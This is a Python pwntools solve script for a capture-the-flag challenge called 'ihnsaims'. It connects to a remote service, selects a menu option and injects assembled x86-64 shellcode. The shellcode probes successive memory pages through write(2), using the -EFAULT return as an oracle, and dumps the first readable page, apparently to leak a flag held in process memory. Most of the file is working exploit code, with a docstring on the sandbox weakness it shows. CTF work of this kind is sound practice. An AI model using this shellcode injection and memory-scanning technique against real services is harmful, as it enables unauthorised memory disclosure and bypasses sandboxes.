#!/usr/bin/python3
"""CTF solve script for the `ihnsaims` challenge binary (pwntools).

Flow, as visible in this script:
  1. Connect to the remote service.
  2. Answer the first prompt (ending in "!\\n") with menu choice "1"
     (the original author's comment calls this option "write").
  3. Answer the next prompt with raw machine code assembled from SCAN_ASM.
  4. Drop into interactive mode to read whatever the service sends back.

Why the shellcode matters from a defensive point of view: it never reads
memory directly. It hands successive page addresses to write(2) and lets the
kernel report -EFAULT (-14) for pages it cannot read, so the syscall's return
value doubles as a "is this page mapped?" oracle. A sandbox that still
permits write(2) with caller-chosen pointers therefore does not stop memory
disclosure. The commented-out local run passes the flag on the command line,
which suggests the secret lives in process memory (argv) rather than in a
file -- confirm against the challenge binary.
"""
from pwn import *

# Loading the ELF sets pwntools' arch/bits so asm() emits matching code.
# NOTE(review): register names and syscall numbers below assume x86-64 Linux.
context.binary = target = ELF("./ihnsaims", checksec=False)

# Local test variant kept from the original (flag supplied as argv):
# r = process("./ihnsaims flag{fake_flag}", shell=True)
r = remote("54.85.45.101", 8002)


def send_after_prompt(data):
    """Wait for the service prompt terminator b"!\\n", then send `data`."""
    return r.sendafter(b"!\n", data)


# Menu selection: "write" (per the original comment).
send_after_prompt(b"1")

# Shellcode, step by step:
#   - r12 starts at whatever rdx holds on entry
#     (presumably the address of the injected buffer -- TODO confirm).
#   - label a: advance r12 by one 4 KiB page, then write(1, r12, 0x1000).
#   - rax == -14 (-EFAULT): the page was not readable, try the next one.
#   - otherwise fall through to label b: exit_group(0) (syscall 231).
# The `jne b` is redundant with the fall-through but is kept unchanged.
SCAN_ASM = """
    lea r12, [rdx]
a:
    lea r12, [r12+0x1000]
    mov rdi, 1
    mov rsi, r12
    mov rdx, 0x1000
    mov rax, 1
    syscall
    cmp rax, -14
    je a
    jne b
b:
    xor rdi, rdi
    mov rax, 231
    syscall
"""

payload = asm(SCAN_ASM)
send_after_prompt(payload)

# Hand the socket to the terminal so the dumped page can be inspected.
r.interactive()